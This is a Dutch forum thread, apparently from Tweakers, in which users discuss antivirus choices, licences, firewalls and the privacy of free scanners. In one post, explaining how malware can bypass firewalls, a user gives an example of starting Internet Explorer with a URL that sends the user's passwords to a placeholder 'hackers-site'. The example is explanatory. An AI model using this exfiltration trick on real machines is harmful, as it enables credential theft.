Acties:
  • 0 Henk 'm!

• daffie82
  • Registratie: November 2005
  • Laatst online: 10:00
daffie82 schreef op woensdag 13 april 2016 @ 23:11:
Waterfox Portable wordt opeens niet meer herkend door HMPA.
Iemand een idee hoe dit te fixen? Ook via "actieve toepassingen" wordt hij niet herkend door HMPA.

De portable is een andere executable, maar automatisch wordt ook de gewone waterfox mee opgestart.
Dus in task manager zie je er altjd twee.

Hoor graag een mogelijke oplossing.
Heb dit probleem dus ook met de reguliere waterfox (niet portable).

Iemand suggesties?
HMPA al opnieuw geinstalleerd, maar helpt niet. HMPA ziet waterfox wel als browser in het programma, dus op dat gebied lijkt alles normaal.
Maar toch is waterfox niet beschermd (geen melding bij opstarten, geen groene rand).

Pale moon werkt wel correct trouwens.

Help??

LG OLED65G1RLA / Samsung HW-Q990D / Sony UBP-X800M2 / Ugoos AM6B+ (CE with CPM Build) / FiiO DM13 BT / Redmi Note 12 Pro+ v2.0.7.0 (UMOEUXM)

Acties:
  • 0 Henk 'm!

• grun93
  • Registratie: April 2004
  • Laatst online: 07:39
Jorgen schreef op zondag 17 april 2016 @ 14:26:
Wat is nu eigenlijk best practise?
Of het het beste is, weet ik niet, maar ik installeer eerst het OS (windows in mijn geval) zonder netwerkkabel of wifi aangesloten. Meteen daarna een offline installer van de virusscanner installeren en daarna pas het netwerk activeren. Dan als eerste de scanner updaten en een scan uitvoeren. Als laatste pas windows updaten.

Acties:
  • 0 Henk 'm!
Jorgen schreef op zondag 17 april 2016 @ 14:26:
Wat is nu eigenlijk best practise?

Hoeveel gevaar loop je nu eigenlijk, als je, direct na een nieuwe installatie van Windows

1) Zonder virusscanner Windows Update draait en deze updates downloadt en installeert

of
2) Zonder Windows updates direct online gaat om je virusscanner te downloaden en daarna Windows Update draait

of moet je het maar tegelijk doen, met alle keren installeren en opnieuw opstarten van virusscanner en Windows Update dwars door elkaar heen.
Je kunt in veel gevallen ook eerst een scanner installeren uit offline bron om deze daarna direct te updaten.

Over Bor | Vraag & Aanbod feedback | Frontpagemoderatie Forum

Acties:
  • 0 Henk 'm!

• Jorgen
  • Registratie: Mei 2007
  • Nu online

Jorgen

Moderator Beeld & Geluid

AV Liefhebber

Dat deed ik altijd, maar tegenwoordig koop ik Norton 360 direct bij Norton en krijg je vaak gewoon een downloadlicentie.

Your Friendly Neighborhood Moderator

Acties:
  • 0 Henk 'm!

• daffie82
daffie82 schreef op maandag 18 april 2016 @ 10:31:
[...]

Heb dit probleem dus ook met de reguliere waterfox (niet portable).

Iemand suggesties?
HMPA al opnieuw geinstalleerd, maar helpt niet. HMPA ziet waterfox wel als browser in het programma, dus op dat gebied lijkt alles normaal.
Maar toch is waterfox niet beschermd (geen melding bij opstarten, geen groene rand).

Pale moon werkt wel correct trouwens.

Help??
Niemand die HMPA gebruikt en die dit even voor me kan testen? Thanks!

Waterfox 44.0.3
HMPA 319 b363

LG OLED65G1RLA / Samsung HW-Q990D / Sony UBP-X800M2 / Ugoos AM6B+ (CE with CPM Build) / FiiO DM13 BT / Redmi Note 12 Pro+ v2.0.7.0 (UMOEUXM)

Acties:
  • 0 Henk 'm!

• GerardVanAfoort
  • Registratie: April 2010
  • Niet online

GerardVanAfoort

kalm aan

daffie82 schreef op donderdag 21 april 2016 @ 12:07:
Niemand die HMPA gebruikt en die dit even voor me kan testen? Thanks!

Waterfox 44.0.3
HMPA 319 b363
Pro.alert 2.6.5 op Windows 7 Pro 64-bit geeft keurig (default) de groene inschuifende balk rechtsboven in het scherm hier Waterfox 44.0.3

NRG

Acties:
  • 0 Henk 'm!

• daffie82
GerardVanAfoort schreef op donderdag 21 april 2016 @ 21:19:
[...]

Pro.alert 2.6.5 op Windows 7 Pro 64-bit geeft keurig (default) de groene inschuifende balk rechtsboven in het scherm hier Waterfox 44.0.3
Bedankt voor het testen.
Je gebruikt wel een oudere hmpa versie. Dus moeilijk te vergelijken.
Hier w7 enterprise x64 trouwens.

Acties:
  • 0 Henk 'm!

• EricJH
  • Registratie: November 2003
  • Laatst online: 13-10 22:44
Jorgen schreef op maandag 18 april 2016 @ 15:24:
Dat deed ik altijd, maar tegenwoordig koop ik Norton 360 direct bij Norton en krijg je vaak gewoon een downloadlicentie.
Bewaar je de download die je eerder gemaakt hebt niet?

Off topic. Het verbaast me dat veel mensen installers niet bewaren.

Acties:
  • 0 Henk 'm!

• Jorgen
  • Registratie: Mei 2007
  • Nu online

Jorgen

Moderator Beeld & Geluid

AV Liefhebber

EricJH schreef op vrijdag 22 april 2016 @ 16:41:
[...]
Bewaar je de download die je eerder gemaakt hebt niet?

Off topic. Het verbaast me dat veel mensen installers niet bewaren.
Nee, ik ga vaak voor een verse installer vanaf de website. Dan weet ik zeker dat alles up-to-date is. Je moet daar alleen wel voor online gaan.

Your Friendly Neighborhood Moderator

Acties:
  • 0 Henk 'm!

Verwijderd

Hallo,
Momenteel heb ik Symantec Endpoint Protection wat via de universiteit is geleverd. Ik krijg echter een reset van mijn laptop met enkel windows 7 besturingssysteem als ik me uitschrijf. Toen ik zojuist keek schrok ik een beetje van de prijzen voor licenties (60 euro per jaar, 110 voor 3 jaar).

Ik weet dat het een beetje een open vraag is, maar wat is een goede gratis of niet overdreven duur pakket waar ik van op aan kan dat mijn pc goed beveiligd is voor zover dat kan? Ik zie door de bergen informatie met wat welk pakket bevat/of het goed werkt/prijs de juiste niet meer. Hopelijk kunnen jullie me helpen.

[ Voor 9% gewijzigd door Verwijderd op 03-05-2016 14:56 ]

Acties:
  • 0 Henk 'm!

• EricJH
Als je sec een goede gratis AV zoekt dan kan Comodo oplossingen bieden met Comodo Antivirus en Comodo Cloud Anti Virus. Beiden hebben naast de detectie door de AV een sandbox als vangnet. Dat is een dubbele bescherming. De sandbox zal de werking van malware neutraliseren ook als daar (nog) geen av definities van zijn; het werkt proactief.

Comodo Antivirus is de Comodo Internet Security Suite zonder de firewall. Comodo Cloud Antivirus is een standalone product; het is vrij nieuw en volop in ontwikkeling.

Acties:
  • 0 Henk 'm!
Verwijderd schreef op dinsdag 03 mei 2016 @ 14:54:
Hallo,
Momenteel heb ik Symantec Endpoint Protection wat via de universiteit is geleverd. Ik krijg echter een reset van mijn laptop met enkel windows 7 besturingssysteem als ik me uitschrijf. Toen ik zojuist keek schrok ik een beetje van de prijzen voor licenties (60 euro per jaar, 110 voor 3 jaar).

Ik weet dat het een beetje een open vraag is, maar wat is een goede gratis of niet overdreven duur pakket waar ik van op aan kan dat mijn pc goed beveiligd is voor zover dat kan? Ik zie door de bergen informatie met wat welk pakket bevat/of het goed werkt/prijs de juiste niet meer. Hopelijk kunnen jullie me helpen.
Heb je dit topic al goed doorgenomen? Hier vind je veel tips en afraders inclusief links naar test sites waar je min of meer objectief een oordeel kunt vellen. Jouw vraag komt hier met enige regelmaat voorbij. Een betaalde antivirus hoeft helemaal niet zo duur te zijn overigens. De meeste leveranciers hebben regelmatig aanbiedingen waardoor je soms voor erg weinig een premium product kunt aanschaffen. Dergelijke aanbiedingen zijn ook al vaker in dit topic genoemd. Het rondshoppen loont op dit vlak behoorlijk soms. Kijk wel uit met 3rd party aanbieders uit bijvoorbeeld het buitenland (of aanbiedingssites als ebay / marktplaats ea). Van leveranciers o.a. Bitdefender is bekend dat grijze / illegale keys worden geblokkeerd.
EricJH schreef op woensdag 04 mei 2016 @ 01:22:
Als je sec een goede gratis AV zoekt dan kan Comodo oplossingen bieden met Comodo Antivirus en Comodo Cloud Anti Virus. Beiden hebben naast de detectie door de AV een sandbox als vangnet. Dat is een dubbele bescherming. De sandbox zal de werking van malware neutraliseren ook als daar (nog) geen av definities van zijn; het werkt proactief.

Comodo Antivirus is de Comodo Internet Security Suite zonder de firewall. Comodo Cloud Antivirus is een standalone product; het is vrij nieuw en volop in ontwikkeling.
Als je een goede AV zoekt zou ik Comodo niet aanraden. Deze scoort in de laatste tests beneden peil, ongeveer gelijk tot iets minder dan Windows Defender. Een bron vind je hier (sorteer op protection): https://www.av-test.org/e.../home-windows/windows-10/

Het vreemde is dat de detectie aardig beneden industry standard ligt in de test van oktober maar hiervoor beter leek te zijn.

Acties:
  • 0 Henk 'm!

Verwijderd

Bedankt voor de reactie. Maar als ik bijvoorbeeld naar Bitdefender kijk, zijn er al 3 pakketten beschikbaar. Total security lijkt me overbodig, maar het verschil tussen antivirus plus en internet security is ''een volgende generatie firewall''. Of dat nodig is weet ik niet, in dit topic worden beide gekozen. Dan heb ik het nog niet eens vergeleken met andere aanbieders zoals Kaspersky die hier worden aangeraden, of naar de prijs gekeken. Op andere sites http://www.consumentenbon...net-security-2016/reviews zijn de meningen ook sterk verdeeld over bitdefender, van geweldig tot ''pc sloom'', ''zware belasting'' en ''geen keys ontvangen''. Of Kaspersky met 'Russische connecties'', weet niet of ik daar zo gerust over ben. 'Er is zoveel, zowel positieve als negatieve, informatie.

Ik heb windows 7. De eerste vraag is denk ik: Wat voor een pakket heb ik nodig en wat zijn de precieze verschillen? Bitdefender als Kaspersky hebben zowel antivirus als internet security. Of toch Eset NOT32 waar hier ook goede verhalen over zijn, maar waar ook weer een smart security versie van is.

En momenteel heb ik dus nog een kleine week Symantec Endpoint Protection, wat helemaal niet genoemd wordt in dit topic; wordt alleen 1 keer vermeld dat het niet vermeld wordt. Vind het sowieso te duur (61e/1y), maar is dit dan een ander soort programma of zo?

[ Voor 5% gewijzigd door Verwijderd op 04-05-2016 12:27 ]

Acties:
  • +1 Henk 'm!
Verwijderd schreef op woensdag 04 mei 2016 @ 12:14:
Ik heb windows 7. De eerste vraag is denk ik: Wat voor een pakket heb ik nodig? Bitdefender als Kaspersky hebben zowel antivirus als internet security. Of toch Eset NOT32 waar hier ook goede verhalen over zijn.
Wat voor pakket je nodig hebt kunnen wij niet voor je beslissen. Wil je alleen een anti-virus product dan is in de meeste gevallen voldoende aangevuld met bijvoorbeeld de Windows eigen firewall. Elke leverancier heeft een overzicht tussen de exacte verschillen van de afzonderlijke versies. Een uitgebreider pakket biedt vaak meer tooling, een firewall of andere opties zoals anti-spam maatregelen etc.

Door aanbiedingen is het soms interessanter of zelfs voordeliger om naar een uitgebreider pakket te kijken. Rondkijken loont.

Wat betreft het verschil tussen verschillende merken is er hier in dit topic wel het eea te vinden. Voor de rest kun je de review / test sites uit de topicstart raadplegen of zelfs trial versies draaien. Bijna alle leveranciers hebben een trail beschikbaar. Op die manier kom je zelf snel achter wat bevalt en wat niet.

De verschillende Bitdefender pakketten hebben trouwens meer verschillen;
http://www.bitdefender.nl...antivirus-comparison.html

Kijk ook goed hoeveel PC's je wilt beschermen. Een 3 PC licentie is al snel een behoorlijk stuk duurder dan een 1 PC licentie.

[ Voor 10% gewijzigd door Bor op 04-05-2016 12:29 ]

Acties:
  • 0 Henk 'm!

Verwijderd

Laat ik het zo stellen dan: is windows firewall voldoende? Microsoft Security Essentials wordt bijvoorbeeld afgeraden door jullie, maar is de firewall wel goed genoeg? Of raden jullie aan voor een pakket met firewall te gaan (Bitdefender/Kaspersky internet security of Eset smart security dus)

1pc, windows 7 trouwens. En de andere verschillen met total security leken mij niet zo van belang.

[ Voor 27% gewijzigd door Verwijderd op 04-05-2016 12:37 ]

Acties:
  • +1 Henk 'm!
Verwijderd schreef op woensdag 04 mei 2016 @ 12:30:
Laat ik het zo stellen dan: is windows firewall voldoende? Microsoft Security Essentials wordt bijvoorbeeld afgeraden door jullie, maar is de firewall wel goed genoeg? Of raden jullie aan voor een pakket met firewall te gaan (Bitdefender/Kaspersky internet security of Eset smart security dus)

1pc, windows 7 trouwens. En de andere verschillen met total security leken mij niet zo van belang.
Als je op een publiek netwerk zit (dus met onbekenden) dan is een firewall aan te raden. Zit je op een prive thuisnetwerk, dan blokkeert je router al alle inkomende pakketjes. Dus dan heb je al bescherming op netwerk-niveau. Een groot deel van de *Internet Security* totaal pakketjes doet niet veel meer dan dat op firewall gebied, alleen heb je dan de mogelijkheid om het per applicatie in te stellen. Het gaat vaak niet verder dan het opgeven van de executable path, tcp/udp, inbound/outbound, port, al dan niet automatisch. Een Internet Security pakket dat alleen dit type firewalls aanbied, neem ik op dit gebied eigenlijk niet eens serieus, en dat zijn ze bijna allemaal.
Het probleem is alleen, des te beter de firewall, des te meer interactie (kwa meldingen) jij als gebruiker met de firewall hebt, en dus des te meer technische kennis je moet hebben.
Een lijstje met firewall testresultaten is hier te vinden: http://www.matousec.com/p...-challenge-64/results.php

Acties:
  • 0 Henk 'm!

Verwijderd

Ok bedankt voor je reactie. In Nederland zit ik bijna altijd op een prive netwerk, maar ik ga binnenkort voor langere tijd naar het buitenland waar ik denk dat dit niet het geval is. Dan raad je dus aan om niet de standaard windows firewall te gebruiken, maar een pakket te gebruiken waar een betere inzit? Volgens jouw lijstje en de hier aangeraden producten zou ik dan kaspersky moeten nemen als ik alles goed interpreteer, die erg prijzig is en die Russische connectie heeft. Bitdefender heeft een score van niks. Dan kom je uit bij ESET smart security, is dit dan een product wat jullie aanraden; is het goed genoeg (Beter dan windows? Die staat er niet bij) en werkt het goed op windows 7 (misschien zelfs vista op een andere pc)?

Wat me ook weer opvalt is dat Symantec Endpoint Protection nergens wordt genoemd. Wat is daarmee? Technische kennis is, zoals jullie merken, rond de 0.

[ Voor 7% gewijzigd door Verwijderd op 04-05-2016 14:23 ]

Acties:
  • +1 Henk 'm!
Ik zou persoonlijk, net als Cyb al aangeeft, niet te veel waarde hechten aan de meeste firewalls uit de hogere av pakketten. In veel gevallen bieden die amper aanvullende functies boven de standaard Windows firewall. Het grote voordeel zit in een alles-in-1 oplossing incl een firewall voor sommige mensen en een stukje extra gemak / logging / management. Enkele leveranciers bieden extra functionaliteit of aanvullende beveiligingsmaatregelen waardoor ze wat beter presteren. Het nadeel is vaak dat je daar ook meer last van kunt hebben of dat er meer configuratie nodig is.

Let wel dat resultaten soms erg versie afhankelijk kunnen zijn. In het matousec overzicht staat Outpost nog. Dat product wordt niet meer geleverd.
In December 2015 Yandex acquired Agnitum software technology. These technologies will now be used to protect users of Yandex Browser. As a result of the acquisition, Agnitum terminates direct and partner sales of the Outpost product line. Agnitum will provide antivirus base updates, bug fixing and technical support until December 31, 2016.

Acties:
  • +1 Henk 'm!

• Baserk
  • Registratie: Februari 2007
  • Laatst online: 13-10 23:56
De test resultaten van Matousec moeten sowieso wel op waarde worden geschat.
De opbouw van de gehele test in meerdere blokken met tests, waarbij een faal in 1 van de tests in bijv. blok 2 of blok 4 meteen diskwalificatie voor alle resterende blokken inhoudt, geeft de belabberde resultaten voor sommige gerenommeerde namen.
En zorgt daarnaast voor software die soms wel en soms niet 'Matousec-getuned' wordt.
Er wordt echt geen onzin getest maar de opbouw is wel zeer cijfer bepalend.

Romanes eunt domus | AITMOAFU

Acties:
  • 0 Henk 'm!

Verwijderd

Ok heel bedankt allemaal voor alle reacties, het begint een beetje duidelijk te worden. Ik denk dat ik Eset NOD32 Antivirus ga aanschaffen. Heb nu wat gerichter kunnen zoeken en volgens mij is iedereen er wel tevreden over. Dit gecombineerd met de Windows firewall is dan voldoende als die AV firewalls nauwelijks iets toevoegen. En voor de browser uBlock Origin bijvoorbeeld. En is het nog slim om de gratis versie van malwarebytes ernaast te gebruiken?

Weet niet of het slim is om de trial te proberen, maar heb nu nog SEP op de pc staan en dat zal wel clashen. Maar als jullie goede ervaringen hebben dan zal het wel los lopen.

Edit: vraagje over kosten: een jaar kost 29, 3 jaar kost 61, maar 3x1jaar kost 38 euro. https://shop.eset.nl/1-eset-nod32-antivirus
Weten jullie of die licenties ''te bewaren'' zijn en achter elkaar te gebruiken? Of moeten ze op verschillende pc's binnen een bepaalde periode gebruikt worden.

[ Voor 53% gewijzigd door Verwijderd op 04-05-2016 17:25 ]

Acties:
  • 0 Henk 'm!
Baserk schreef op woensdag 04 mei 2016 @ 14:48:
[...]En zorgt daarnaast voor software die soms wel en soms niet 'Matousec-getuned' wordt.[...]
Ik betwijfel of je het 'tunen' zou moeten noemen. Ik zie het meer als methodes die kwaardaardige software zouden kunnen gebruiken om de firewall te omzeilen. Nieuwe methodes worden mogelijk met regelmaat ontdekt. Matousec schrijft er volgens een test voor, en de fabrikanten die er waarde aan hechten aan het detecteren van dergelijke methodes, implementeren detectie ervan in hun pakket, met behulp van de resultaten en tests van Matousec.

Een paar fabrikanten hebben op die manier hun product regelmatig verbeterd.

Een simpel voorbeeldje van het omzeilen van de veel firewalls is bijv. dit:
Browsers hebben meestal volledig toegang tot Internet, maar onbekende applicaties niet. Een onbekende applicatie zou iexplore.exe (Internet Explorer) kunnen misbruiken door IE te starten met de volgende meegegeven URL: http:// hackers-site/?data=EEN_LIJST_MET_AL_JE_PASSWORDEN
En zo zijn er nog tientallen trukjes die kwaadaardige software zouden kunnen gebruiken.

Maar daarvoor moet je meestal wel eerst al het kwaadaardige stukje software hebben binnengehaald, en daar heb je vaak een virusscanner/malware scanner weer net voor.

Acties:
  • 0 Henk 'm!

• GerardVanAfoort
  • Niet online

GerardVanAfoort

kalm aan

Verwijderd schreef op woensdag 04 mei 2016 @ 16:44:
Ok heel bedankt allemaal voor alle reacties, het begint een beetje duidelijk te worden. Ik denk dat ik Eset NOD32 Antivirus ga aanschaffen. Heb nu wat gerichter kunnen zoeken en volgens mij is iedereen er wel tevreden over. Dit gecombineerd met de Windows firewall is dan voldoende als die AV firewalls nauwelijks iets toevoegen. En voor de browser uBlock Origin bijvoorbeeld. En is het nog slim om de gratis versie van malwarebytes ernaast te gebruiken?

Weet niet of het slim is om de trial te proberen, maar heb nu nog SEP op de pc staan en dat zal wel clashen. Maar als jullie goede ervaringen hebben dan zal het wel los lopen.

Edit: vraagje over kosten: een jaar kost 29, 3 jaar kost 61, maar 3x1jaar kost 38 euro. https://shop.eset.nl/1-eset-nod32-antivirus
Weten jullie of die licenties ''te bewaren'' zijn en achter elkaar te gebruiken? Of moeten ze op verschillende pc's binnen een bepaalde periode gebruikt worden.
De licenties bij Eset worden online verlengd. In dat geval is 3 jaar voor € 61,- een voordelige keus en de 3 devices voor 1 jaar € 38,- niet langer dan 1 jaar te gebruiken.

Wel kun je tussentijds je licentie uitbreiden of veranderen naar bv multi-device licentie (in geval van meerdere devices). Heb zelf ook Smart Security gehad maar vond de firewall (meerdere niveaus geprobeert) eigenlijk lastig beheren/onvoldoende toevoegen.

NRG

Acties:
  • 0 Henk 'm!
Verwijderd schreef op woensdag 04 mei 2016 @ 16:44:

Nooit meerdere virusscanners naast elkaar installeren. Dit geeft vroeg of laat (ernstige) problemen. De trial kun je toch doen wanneer je huidige licentie is verlopen?

Acties:
  • 0 Henk 'm!

• Baserk
  • Registratie: Februari 2007
  • Laatst online: 13-10 23:56
En gebruik de juiste verwijdertool van Symantec om SEP eraf te halen.
Wellicht overbodig maar reboot daarna, voordat je de nieuwe AV installeert.

Romanes eunt domus | AITMOAFU

Acties:
  • 0 Henk 'm!
Verwijderd schreef op woensdag 04 mei 2016 @ 14:11:
Ok bedankt voor je reactie. In Nederland zit ik bijna altijd op een prive netwerk, maar ik ga binnenkort voor langere tijd naar het buitenland waar ik denk dat dit niet het geval is. Dan raad je dus aan om niet de standaard windows firewall te gebruiken, maar een pakket te gebruiken waar een betere inzit? [...]
Zou gewoon de standaard windows firewall nemen, en zorgen dat ie inkomend verkeer blokeert.
Als je op een open netwerk zit waar iedereen op kan, dan zou ik wel een VPN verbinding huren (sommige routers hebben het ook in ingebouwd), anders kan het ook met firewall nog behoorlijk onveilig zijn. (CT Magazine van april ging er ook op in.)

Acties:
  • 0 Henk 'm!

• EricJH
Bor schreef op woensdag 04 mei 2016 @ 08:45:
Als je een goede AV zoekt zou ik Comodo niet aanraden. Deze scoort in de laatste tests beneden peil, ongeveer gelijk tot iets minder dan Windows Defender. Een bron vind je hier (sorteer op protection): https://www.av-test.org/e.../home-windows/windows-10/

Het vreemde is dat de detectie aardig beneden industry standard ligt in de test van oktober maar hiervoor beter leek te zijn.
De tests van av-test kijken louter naar detectiegraad als maat van bescherming die programma's bieden. Wat zou er gebeuren als er gekozen zou worden voor een testmethode waarbij virussen worden uitgevoerd en dus in de sandbox terecht komen? Hoeveel daarvan zullen in staat zijn het systeem besmetten? Dat is een andere discussie. Back on topic.

De kracht van de Comodo AV zit in de gelaagde bescherming die de sandbox samen met de AV biedt. De sandbox biedt zeer goede bescherming zonder dat het definities nodig heeft; het begrenst het gedrag van onbekende executables. Wat de AV mist, en malware missen doen ze allemaal, pakt de sandbox in de regel. Daarnaast is het een gratis programma. Dat is voor pietkok ook een overweging.

Acties:
  • 0 Henk 'm!

• grun93
EricJH schreef op donderdag 05 mei 2016 @ 01:16:
Daarnaast is het een gratis programma. Dat is voor pietkok ook een overweging.
Bij het woord 'gratis' vraag ik me altijd af wat dan het verdienmodel is. Voor niks gaat de zon op.

Acties:
  • 0 Henk 'm!

Verwijderd

Die eset codes (smart security) kan je ook voordelig in bulk kopen, gewoon van de officiële site. Als iemand interesse in een code heeft voor een voordelige prijs laat maar weten.

[ Voor 4% gewijzigd door Verwijderd op 05-05-2016 06:53 ]

Acties:
  • 0 Henk 'm!

• Onbekend
  • Registratie: Juni 2005
  • Laatst online: 13:37

Onbekend

...

grun93 schreef op donderdag 05 mei 2016 @ 05:52:
[...]

Bij het woord 'gratis' vraag ik me altijd af wat dan het verdienmodel is. Voor niks gaat de zon op.
Vaak bieden gratis virusscanners de consumentenversie gratis aan, maar voor de versie bij bedrijven moet voor worden betaald.

Volgens mij wordt d.m.v. de consumentenversie "vernieuwde" software getest waarna deze in de bedrijvenversie kan worden gebruikt.
Daarnaast heb je met een zeer grote hoeveelheid consumenten wereldwijd een groot dekkingsgebied en kan je allerlei informatie over verschillende soorten virussen verzamelen. Hoe meer mensen de virusscanner hebben geïnstalleerd, des te sneller kunnen ze nieuwe virussen vinden zodat ze sneller nieuwe updates kunnen uitbrengen.
Voor een antivirusfabrikant het niet uit of de software op 1 miljoen of op 100 miljoen computers is geïnstalleerd. Het werk blijft het zelfde, en zolang de ontwikkelingskosten lager blijft dan de inkomsten van bedrijven blijft het voor veel fabrikanten voldoende om de consumenten editie gratis aan te bieden.

Speel ook Balls Connect en Repeat

Acties:
  • 0 Henk 'm!
[...]

Het verdienmodel kan ook de handel in je persoonlijke gegevens zijn. Virusscanner komen een stuk dichter bij je gegevens van veel andere type software, waardoor de stap in de handel met je gegevens gemakkelijker/kleiner is. Kaspersky bijvoorbeeld, krijgt je complete internet surfgedrag binnen. Op basis daarvan kunnen ze een compleet profielen opmaken van je gedrag en gesteldheid, welke ze vervolgens weer kunnen doorverkopen aan andere data handelaren, overheden, verzekeraars en derden.

Over de digitale handel in persoonsgegevens: http://zembla.vara.nl/seizoenen/2015/afleveringen/02-12-2015

Acties:
  • 0 Henk 'm!

• grun93
Cyb schreef op donderdag 05 mei 2016 @ 12:53:
Het verdienmodel kan ook de handel in je persoonlijke gegevens zijn.
Precies, en het hangt van de user af of die zich dat wel realiseert.

Overigens, mijn opmerking was niet bedoeld als iets waarop ik een antwoord hoefde te hebben, maar meer als soort van waarschuwing of moment van bezinning voor degenen die zich makkelijk laten verblinden door het woord gratis. Alsof gratis een voordeel is, dat vind ik namelijk niet.

Acties:
  • 0 Henk 'm!

• Onbekend
  • Laatst online: 13:37

Onbekend

...

Die persoonlijke gegevens.... Betaalde virusscanners doen niets met jouw persoonlijke gegevens?
Zelfs voor Windows 10 betaal je geld, terwijl er evengoed persoonlijke gegevens naar Microsoft worden gestuurd.

Speel ook Balls Connect en Repeat

Acties:
  • 0 Henk 'm!

• EricJH
[...]

Comodo kent betaalversies van Comodo beveiligingsproducten. Dan betaal je voor de extra services maar niet voor het programma. Het programma is hetzelfde voor de gratis en betaalversies. Comodo verkoopt geen gebruikersinformatie. Er is een een affiliatie met Yahoo maar die kun je in de installer uitvinken.

Enkele quotes uit Comodo (Melih) Manifesto die een licht werpen op waarom Comodo gratis beveiligingsproducten aan de wereld geeft:
[...]
a Trusted Internet,
[...]
And for it to benefit everyone, it must be delivered as a right to everyone; not as a luxury or a privilege dependent on a person’s ability to pay! To reach this state, we intend to change behavior and help people move from not using PC security because they can’t afford it to using PC security because we give it away for free.
De Comodo CEO legt in Give all that for FREE!!! What's the Catch? How does Comodo Make Money? uit waar het geld voor de gratis programma's vandaan komt en waarom Comodo die keuze maakt:
What Comodo is trying to do is simple! Give high quality high security desktop security products for free!

Why?: Comodo makes money selling Digital Certificates to businesses (we are the guys who enable the yellow padlock you see when you visit sites etc). We decided to build our Brand, Comodo, to be a household name. We don't have $500Million sitting in the bank account

(hold on.....let me check with my Chief Financial Officer (CFO) .....

2 min later....

Ok confirmed we don't! :-) )

for us to run a huge advertising campaign so that we can build the brand.

Comodo is full of techies who are damn good at what they do. So we said, why not give everyone a desktop security products for free! If we are able to write good software and give such valuable software for free, our name will be known in the market place, we will build our Comodo brand and this brand will be associated with security. And this will help us sell more Digital Certificates and other services we have as we will have a big brand!

All we want from our users is their trust! of course, we understand that we have to earn it! We are doing that by building, for our users, unmatched Desktop security products so that they will never have to worry about

1)Which security product they should buy

2)Where they should buy it from

3)How much they should pay for it.

Because we will provide them all of the security products they will need, for free, we are hoping that we will gain our user's trust so that we can be a big brand and this will help our other services that we sell to enterprises!

Also if we can achieve our goals, it will mean people who could not otherwise have access to security technologies, can now have it for free. This will help the fight against spyware/trojans that convert PCs into zombies and help the virtual criminal underworld. Afterall its not the PCs in large enterprises that are zombies but its the ones at people's home who cannot afford (or not prepared) to pay for these type of products. And in return this will lead to creating a more trusted ecosystem for all of us to interact with on the Internet! So its a win-win for the end users and Comodo!

Hope I explained myself well enough (to me it sounded bloody good :-) )

cheers

Melih

CEO
Comodo

Acties:
  • 0 Henk 'm!
EricJH schreef op vrijdag 06 mei 2016 @ 05:18:
[...]
Comodo kent betaalversies van Comodo beveiligingsproducten. Dan betaal je voor de extra services maar niet voor het programma. Het programma is hetzelfde voor de gratis en betaalversies. Comodo verkoopt geen gebruikersinformatie. [...]
Klinkt goed. Omdat ze ook andere type producten kopen, zoals SSL certificaten, wat dicht bij privacy ligt, willen ze hun naam misschien natuurlijk ook goed houden.

De privacy policy:
https://www.comodo.com/repository/privacy-policy.php
Personal information is collected from customers only after obtaining consent, which is obtained when customers are prompted for information when subscribing to the services, by using a Comodo website, downloading a product, or requesting further information. Personally-identifiable information is not collected when a user simply browses the website. Comodo may contact customers about offers and opportunities from Comodo or its business partners, to conduct surveys, and gather feedback. This privacy statement does not extend to any information that is beyond the control of Comodo.

In California, IP addresses are considered personally identifiable information.

In the event that third party features and functionalities are incorporated in or made available in or through Comodo products, then the policies of those third parties apply. Please visit each third party’s license agreement and privacy policy to better understand their terms of use and data collection practices.
Als privacy belangrijk is, dan is misschien de combinatie van Comodo Firewall + Emsisoft Anti-Malware het beste.

[ Voor 3% gewijzigd door Cyb op 06-05-2016 12:58 ]

Acties:
  • 0 Henk 'm!

• EricJH
Met standaardinstellingen zal CAV anonieme informatie over crashes, clicks, fouten etc naar Comodo sturen ter verbetering van het product (dit kan uiteschakeld worden):
Send anonymous program usage (e.g. clicks, crashes, errors etc) statistics to COMODO in order to improve the product's quality - Comodo collects collects the usage details from millions of CIS users to analyze their usage patterns for the continual enhancement of the product. Your CIS instillation will collect details on how you use the application and send them periodically to Comodo servers through a secure and encrypted channel. Also your privacy is protected as this data is sent anonymous. This data will be useful to the engineers and developers at Comodo to identify the areas to be developed further for delivering the best Internet Security product. Disable this option if you do not want your usage details to be sent to Comodo. (Default = Enabled)
Bron

Als consument van Comodo gratis producten en als forum lid heb ik nooit een ongevraagde mailing gehad. Zelfs niet over Comodo producten. Wellicht dat het voor klanten van enterprise producten anders is. Daar heb ik geen zicht op.

Ik heb op de Comodo Forums nooit klachten gezien dat er ongevraagd informatie werd toegezonden door Comodo of dat leden de indruk hadden dat ze op andere manier ongewenste informatie toegestuurd gekregen hebben die een verband met Comodo impliceert. De meeste leden zullen denk ik tools als Ghostery, Privacy Badger etc gebruiken om niet getrackt te worden. Volgens Ghostery gebruikt Comodo Forums gebruiken enkel Google Analytics en comodo.com Google Adwords Conversion, Google AJAX search API en Optimizely.

Acties:
  • 0 Henk 'm!

Verwijderd

Bor schreef op woensdag 04 mei 2016 @ 21:26:
[...]

Nooit meerdere virusscanners naast elkaar installeren. Dit geeft vroeg of laat (ernstige) problemen. De trial kun je toch doen wanneer je huidige licentie is verlopen?
Morgen wordt mijn pc gereset en zet ik NOD32 erop. Enkele pagina's geleden gelezen dat ik eerst gewoon alle windows updates moet laten lopen en dan pas de virusscan (NOD32) moet installeren, maar zorgt die dan zelf dat de windows virusscan uit/goed wordt gezet e.d., of moet ik zelf nog bepaalde handelingen/instellingen doen na installatie (op updaten na waarschijnlijk) met windows en de virusscan zelf?

Acties:
  • 0 Henk 'm!

• prinsvlad
  • Registratie: Mei 2010
  • Laatst online: 10-10 09:50
Verwijderd schreef op zondag 08 mei 2016 @ 17:41:
[...]

Morgen wordt mijn pc gereset en zet ik NOD32 erop. Enkele pagina's geleden gelezen dat ik eerst gewoon alle windows updates moet laten lopen en dan pas de virusscan (NOD32) moet installeren, maar zorgt die dan zelf dat de windows virusscan uit/goed wordt gezet e.d., of moet ik zelf nog bepaalde handelingen/instellingen doen na installatie (op updaten na waarschijnlijk) met windows en de virusscan zelf?
Bijna correct , het is Windows die zelf detecteert of er een third party AV wordt geïnstalleerd en dan Windows Defender uitschakelt. Zolang er geen AV wordt geïnstalleerd is Defender actief.
Verdere handelingen zijn niet nodig nadien.

[ Voor 4% gewijzigd door prinsvlad op 08-05-2016 22:01 ]

Acties:
  • 0 Henk 'm!

• prinsvlad
Voor de geïnteresseerden , de laatste update van AV Test

https://www.av-test.org/en/antivirus/home-windows/

Acties:
  • 0 Henk 'm!
